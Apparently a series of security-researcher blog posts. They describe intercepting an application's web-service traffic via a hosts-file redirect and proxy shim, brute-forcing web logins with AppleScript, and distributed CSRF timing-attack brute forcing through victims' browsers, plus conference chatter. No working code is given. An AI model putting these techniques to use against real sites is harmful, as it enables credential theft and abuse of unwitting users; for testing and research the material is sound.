So - here's the scenario.
Lohan is busy testing an application which uses remote web-services on a server called (example) www.target.com, but the program bypasses all proxy servers etc, making it impossible to trap and mangle requests.
So, we do the following:
1 - We make a note of the IP address of www.target.com (in this case, we'll assume it is 196.310.150.126 )
2 - Add a host entry in hosts, mapping www.target.com to 127.0.0.1
3 - Fire up a quick C# app written by yours truly which listens on 127.0.0.1:80
4 - Fire up a proxy server
5 - Configure the C# app to use proxy server 127.0.0.1:port of proxy
Now, the C# app does the following:
1 - Intercepts the HTTP request addressed to www.target.com
2 - Mangles the HTTP request to convert it into a proxied request (ie: Request "GET / HTTP/1.0" now becomes "GET http://220.127.116.11/ HTTP/1.0")
3 - Writes the request to the proxy server
4 - Writes the response back to the application
So, we're now able to intercept, fuzz, mangle etc all the requests and responses between the application and the web service. Not really rocket science, but rather handy...
The screenshot shows something similar, but using a web browser in place of the application here. I am using paros in this example because I am still doing large chunks of work on Suru...
A long time ago i blogged on the joys of using VBS to automate bruteforcing [1|2]when one didnt want to mess about duplicating an applications functionality at the protocol level.. Yesterday i had need to brute-force a web application which tried hard to be difficult and annoying..
This was quick and dirty, if i had more time i would have chosen to read the results and only screenshot results that didnt match "your credentials are invalid".. ahh.. for another day..
*** a word of warning.. AppleScript is described as "an English-like language used to create script files that control the actions of the computer and the applications that run on it." This english-like-ness makes it extremely obtuse at times..
In a subsequent version of the brute force, i wished to use the username from my list, and the users First Name as his password. Now this is an obvious call for a hash/dictionary/associative array.. The sparse documentation that i was able to find on AppleScript records did not appear to help me a jot (but this could just be poor google skills).
Instead i opted for saving the username and password as a ":" delimited string. I then split the string at runtime and submit as before.. ugly, but effective..
Rob had a rant on his site on the timing attack, with a CSRF twist.. We met him after our Vegas talk, but im not really sure how his attack differs from our published one..
my on-list response:
-snip- From: haroon meer
To: firstname.lastname@example.org Cc: email@example.com Subject: Re: [WEB SECURITY] Performing Distributed Brute Forcing of CSRF vulnerable login pages
Thanks for the kind words on the talk.. If you check out the visio at: http://www.sensepost.com/blogstatic/2007/08/dxsrt.png you will see that its pretty much the same attack.. In a shameless display of self-pimpage, check out the paper http://www.sensepost.com/research/squeeza/dc-15-meer_and_slaviero-WP.pdf from page 12.. Figure 23 for example shows the results in a victim/zombies browser, after he has visited our page.. Effectively he tries the userlist we send him (in this case on a standard squirrelmail login page). Once he detects a timing diff (again using a trivial algorithm to avoid latency disparity) he simply makes another request to the attacker to report his success..
We do give the important pieces of the script in the paper, but i suspect anyone with 2 minutes of time could have cobbled them together anyway..
The Symantec Security blog has an article titled "Botnets: not just for spamming anymore". Interestingly we are now starting to see the use of botnets for more than just simple spamming (or simpler DoS attacks).
Its pretty cool (in a twisted sort of way), because this is one of those things we called out a long time ago, predicting that botnets were way under-used as a form of cheap distributed computing. We have been mentioning its potential for effectively minimizing the key-space of session-ids and it looks like its starting to rear its head..
Its one of those combination "i expected this a long time ago" && "oh #$@#.. lets hope it doesnt catch" moments..
ok.. so im in my room finally catching up on sleep (or will be in a few minutes) while most people are finishing Microsofts booze at the PURE microsoft party.. BlackHat is over, which means tomorrow we are off to the riviera for defcon..
Most of the SensePost'ers have been making notes so they can blog on talks they attended.. this will filter through in the next few days.. I caught the Erratasec talk this morning, and have a few thoughts, but ill wait till i have time to actually comment properly..
Last night we found a patch of parking lot to have the first SensePost vs. BlackHat crew (.za vs USA?) Soccer/Football game.. We started off being kicked outa the Palace Ballroom and ended up on a patch of ground outside but it ended up being awesome.. Ultimately, Bradley, Charl, Marco, Nick and I ended up taking on Grifter, DedHed, Joe Grand, Dave, and Chris(?) while j0hnny long was official photographer..
It was all around awesomeness and probably the most fun i personally had in vegas in a while..
We promised to upload one of the tools we demo'd during the talk, so ill do that in a few minutes..